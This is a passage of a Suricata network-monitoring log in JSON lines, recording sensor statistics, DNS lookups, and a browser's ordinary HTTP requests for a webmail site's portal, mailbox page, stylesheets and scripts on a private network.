{"timestamp":"2020-02-29T00:26:41.000179+0000","event_type":"stats","stats":{"uptime":15253,"capture":{"kernel_packets":142145,"kernel_drops":0},"decoder":{"pkts":142149,"bytes":97641480,"invalid":195,"ipv4":140554,"ipv6":10,"ethernet":142149,"raw":0,"null":0,"sll":0,"tcp":134964,"udp":5380,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086688},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2917,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2933,"synack":2924,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2461,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2545}},"flow_mgr":{"closed_pruned":2898,"new_pruned":17,"est_pruned":2547,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10230,"memcap_state":0,"memcap_global":0},"http":{"memuse":640,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:45.000717+0000","flow_id":681193347724086,"event_type":"flow","src_ip":"192.168.10.81","src_port":53146,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1393,"bytes_toclient":6320,"start":"2020-02-29T00:25:39.439094+0000","end":"2020-02-29T00:25:44.703225+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:48.000214+0000","event_type":"stats","stats":{"uptime":15260,"capture":{"kernel_packets":142149,"kernel_drops":0},"decoder":{"pkts":142237,"bytes":97725258,"invalid":195,"ipv4":140642,"ipv6":10,"ethernet":142237,"raw":0,"null":0,"sll":0,"tcp":135052,"udp":5380,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086688},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2918,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2934,"synack":2925,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2461,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2545}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2547,"bypas
sed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":10230,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:26:50.650903+0000","flow_id":690229963583127,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55832,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19892,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:50.759669+0000","flow_id":690229963583127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55832,"proto":"UDP","dns":{"type":"answer","id":19892,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:50.759669+0000","flow_id":690229963583127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55832,"proto":"UDP","dns":{"type":"answer","id":19892,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:53.000483+0000","flow_id":2032669216969740,"event_type":"flow","src_ip":"192.168.10.122","src_port":33731,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:51.889868+0000","end":"2020-02-29T00:21:52.001579+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:26:55.000159+0000","event_type":"stats","stats":{"uptime":15267,"capture":{"kernel_packets":142248,"kernel_drops":0},"decoder":{"pkts":142254,"bytes":97728544,"invalid":196,"ipv4":140657,"ipv6":10,"ethernet":142254,"raw":0,"null":0,"sll":0,"tcp":135064,"udp":5382,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086976},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2919,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2935,"synack":2926,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1923,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2462,"failed_udp":116},"tx":{"http":5023,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2546}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2548,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10230,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:57.000181+0000","flow_id":1410057873142980,"event_type":"flow","src_ip":"192.168.10.122","src_port":60566,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:56.275652+0000","end":"2020-02-29T00:21:56.384455+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:57.000808+0000","flow_id":1686898580184385,"event_type":"flow","src_ip":"192.168.10.122","src_port":35597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:56.580929+0000","end":"2020-02-29T00:21:56.692104+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:59.391250+0000","flow_id":1875606578133074,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55048,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18473,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:59.499528+0000","flow_id":1875606578133074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55048,"proto":"UDP","dns":{"type":"answer","id":18473,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:59.499528+0000","flow_id":1875606578133074,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55048,"proto":"UDP","dns":{"type":"answer","id":18473,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:26:59.699545+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8085}} {"timestamp":"2020-02-29T00:27:02.000204+0000","event_type":"stats","stats":{"uptime":15274,"capture":{"kernel_packets":142262,"kernel_drops":0},"decoder":{"pkts":142279,"bytes":97739194,"invalid":196,"ipv4":140680,"ipv6":10,"ethernet":142279,"raw":0,"null":0,"sll":0,"tcp":135085,"udp":5384,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086976},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2920,"ssn_memcap_drop":0,"pseudo":356,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2936,"synack":2927,"rst":1225,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":149,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1924,"ftp":0,"smtp":0,"tls":788,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":108,"dcerpc_udp":0,"dns_udp":2463,"failed_udp":116},"tx":{"http":5024,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2547}},"flow_mgr":{"closed_pruned":2899,"new_pruned":17,"est_pruned":2550,"bypassed_pruned":0,"flows_che
cked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9900,"memcap_state":0,"memcap_global":0},"http":{"memuse":86179,"memcap":0}}} {"timestamp":"2020-02-29T00:27:04.287799+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8085},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47025,"tx_id":0}} {"timestamp":"2020-02-29T00:27:04.298851+0000","flow_id":848495214366563,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51720,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45791,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:27:04.407027+0000","flow_id":848495214366563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51720,"proto":"UDP","dns":{"type":"answer","id":45791,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:27:04.407027+0000","flow_id":848495214366563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51720,"proto":"UDP","dns":{"type":"answer","id":45791,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:27:04.518331+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8529}} {"timestamp":"2020-02-29T00:27:04.548359+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8529},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36696,"tx_id":1}} {"timestamp":"2020-02-29T00:27:04.556000+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} 
{"timestamp":"2020-02-29T00:27:04.558855+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/mime.css","state":"CLOSED","stored":false,"size":211,"tx_id":2}} {"timestamp":"2020-02-29T00:27:04.559330+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980}} {"timestamp":"2020-02-29T00:27:04.568875+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":24076,"tx_id":3}} {"timestamp":"2020-02-29T00:27:04.569324+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881}} {"timestamp":"2020-02-29T00:27:04.570867+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733}} {"timestamp":"2020-02-29T00:27:04.572003+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpcore.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3881},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpcore.js","state":"CLOSED","stored":false,"size":13894,"tx_id":4}} {"timestamp":"2020-02-29T00:27:04.575006+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855}} {"timestamp":"2020-02-29T00:27:04.582851+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/contextsensitive.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3855},"app_proto":"http","fileinfo":{"filename":"\/js\/contextsensitive.js","state":"CLOSED","stored":false,"size":12330,"tx_id":5}} 
{"timestamp":"2020-02-29T00:27:04.583567+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490}} {"timestamp":"2020-02-29T00:27:04.581934+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport_utils.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":733},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/viewport_utils.js","state":"CLOSED","stored":false,"size":1748,"tx_id":0}} {"timestamp":"2020-02-29T00:27:04.583273+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030}} 
{"timestamp":"2020-02-29T00:27:04.584564+0000","flow_id":1478837499648662,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53172,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/external\/tinycon.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3108}} {"timestamp":"2020-02-29T00:27:04.586989+0000","flow_id":1944167141398822,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53170,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/viewport.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":13568}} {"timestamp":"2020-02-29T00:27:04.588199+0000","flow_id":667939084230883,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53174,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/dragdrop2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5927}} 
{"timestamp":"2020-02-29T00:27:04.592501+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53166,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/passphrase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":490},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/passphrase.js","state":"CLOSED","stored":false,"size":1009,"tx_id":6}} {"timestamp":"2020-02-29T00:27:04.592938+0000","flow_id":2178650880589816,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53166,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/jstorage.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4195}} {"timestamp":"2020-02-29T00:27:04.594190+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/dimpbase.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":30030},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/dimpbase.js","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:27:04.594830+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53168,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2408}} {"timestamp":"2020-02-29T00:27:04.603692+0000","flow_id":2015171540724947,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53168,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/slider2.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 